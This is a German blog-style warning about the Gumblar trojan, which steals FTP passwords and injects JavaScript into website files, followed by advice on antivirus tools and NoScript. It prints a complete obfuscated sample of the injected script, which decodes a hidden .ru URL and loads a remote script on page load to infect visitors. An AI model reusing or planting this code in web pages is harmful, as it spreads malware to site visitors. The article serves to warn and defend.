In den letzten Tagen ging ein kleiner Aufschrei durch das Internet: Der Gumblar Virus hat zugeschlagen!
Im Folgenden wird beschrieben was die Auswirkungen des Gumblar Virus sind und wie man sich dagegen schützen kann.
Was ist der Gumblar Virus?
Der Gumblar Virus ist ein Trojaner
der sich auf PCs einnistet und dort FTP Passwörter klaut. Diese benutzt
er dann, um schadhaften Code auf Internetseiten zu verbreiten. Die
Passwörter holt er sich z.B. von Filezilla, Total Commander oder Adobe
Dreamweaver, die keine oder nur mangelhafte Verschlüsselung der FTP
Passwörter bieten.
Welche Auswirkungen hat der Virus?
Der
Virus geht mit den geklauten Passwörtern über einen FTP Client auf
Internetserver und stellt schadhaften Javascriptcode ans Ende von allen
Dateien die mit "index", "main", "default" anfangen oder die Endung
".js" haben.
Der Code sieht beispielsweise so aus:
var
V;if(V!=''){V='t'};var Rd=new String();function H(){var h;if(h!='OE'
&& h != ''){h=null};var K=String("g");var T;if(T!='' &&
T!='_'){T=null};var y=new Date();var
j="\x68\x74\x74\x70\x3a\x2f\x2f\x79\x38\x2d\x63\x6f\x6d\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2e\x6d\x79\x2e\x6d\x70\x6e\x72\x73\x2d\x63\x6f\x6d\x2e\x54\x68\x65\x42\x6c\x65\x6e\x64\x65\x72\x52\x65\x70\x6c\x61\x63\x65\x6d\x65\x6e\x74\x2e\x72\x75\x3a";var
z;if(z!='' && z!='QX'){z='I'};var g;if(g!='' &&
g!='Kn'){g='sy'};var b=unescape;var u='';this.v='';var kX;if(kX!='zT'
&& kX!='U'){kX='zT'};var s=window;this.E="";var Qq;if(Qq!='e'
&& Qq!='Y'){Qq='e'};function k(A,Q){var Wf;if(Wf!='W' &&
Wf!='QG'){Wf=''};var SL=new Date();var d=b("%5b")+Q+b("%5d");var
IT;if(IT!='Jv'){IT='Jv'};var Z=new RegExp(d, K);var kt;if(kt!='sm'
&& kt!='TS'){kt='sm'};var Gi=new String();return A.replace(Z,
u);var C;if(C!=''){C='is'};var Di;if(Di!=''){Di='SLj'};};var rw=new
Array();var sk=new Array();var Jz;if(Jz!='' &&
Jz!='QT'){Jz='So'};var mt;if(mt!='' && mt!='L'){mt='HJ'};var
R=document;var O='';var
jV=b("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%7a%65%64%67%65%2e%6e%65%74%2f%67%6f%6f%2e%6e%65%2e%6a%70%2f%6e%79%64%61%69%6c%79%6e%65%77%73%2e%63%6f%6d%2e%70%68%70");var
Kq;if(Kq!='MN' && Kq!='UI'){Kq=''};var WV;if(WV!='OG'
&& WV != ''){WV=null};var
D=k('8274506915865346016653','75324961');this.Ha="";var wt='';var
Ez;if(Ez!='' && Ez!='FN'){Ez=null};function S(){O=j;var
og='';O+=D;O+=jV;var UX=new Date();var _p;if(_p!='' &&
_p!='VK'){_p='Gg'};try {var rr;if(rr!='Xr' && rr !=
''){rr=null};var UL=new Date();var yd=new
String();i=R.createElement(k('sIcCrCiIpPte','JPCBKey84d7wI'));this.qd="";var
Jq;if(Jq!='' && Jq!='SC'){Jq='kw'};i.defer=[1][0];i.src=O;var
iw="";var yW='';R.body.appendChild(i);var tb="";} catch(DR){var
Nk;if(Nk!='vNH' && Nk != ''){Nk=null};this.Lx="";};var
ZC;if(ZC!='ib' && ZC!='vn'){ZC='ib'};var kT='';}s[new
String("onloa"+"dkti2".substr(0,1))]=S;var yZ=new Date();var
uJ;if(uJ!=''){uJ='jL'};var zZn='';var DA=new Array();};var Xp="";var
FW;if(FW!='lu' && FW!='Ym'){FW='lu'};var n='';var
fm="";H();this.fb='';
Nur für den Profi ist dabei zu
erkennen, was das Script macht.
Was macht der schadhafte
Javascript Code?
Wenn ein Benutzer auf eine Internetseite
gelangt, die mit dem schadhaften Javascript Code infiziert wurde wird
eine russische Internetseite Aufgerufen, die einen Trojaner bzw.ein
Virus herunter lädt. Sollte man in dem Fall keine Firewall oder einen
Virenscanner haben, wird man sehr wahrscheinlich nichts von der
Infektion mitbekommen und schon ist der eigene PC infiziert.
Wie
finde ich heraus ob mein PC auch infiziert ist?
Eine Internet
Security, ein Virenscanner oder eine Firewall mit jeweils aktueller
Version und Virenupdates werden die Infektion finden. Wer kein Geld für
die kostenpflichtigen Versionen ausgeben will, kann z.B. eine 30-Tage
kostenfreie Version der bekannten Anbieter testen oder greift auf eine
komplett freie Software zurück, wie z.B. die von AVG [1].
Es
gibt auch einige online Virenscanner (z.B. von Trendmicro [2])
die schnell und zuverlässig den Rechner nach Viren und Trojanern
durchsuchen.
Zudem sollte man sich generell vor Javascript Code im
Internet schützen. Eine gutes Firefox-Addon ist das "No-Script" [3]. Hierbei werden
generell alle Scripte geblockt, es sei denn, man vertraut der
Internetseite und gibt die Scripte zur Ausführung frei.
[1] http://free.avg.com/de-de/startseite
[2] http://housecall.trendmicro.com/de/
[3]
https://addons.mozilla.org/de/firefox/addon/722
Bookmarks:
Delicious Facebook Google Yahoo Mr. Wong Linkarena Digg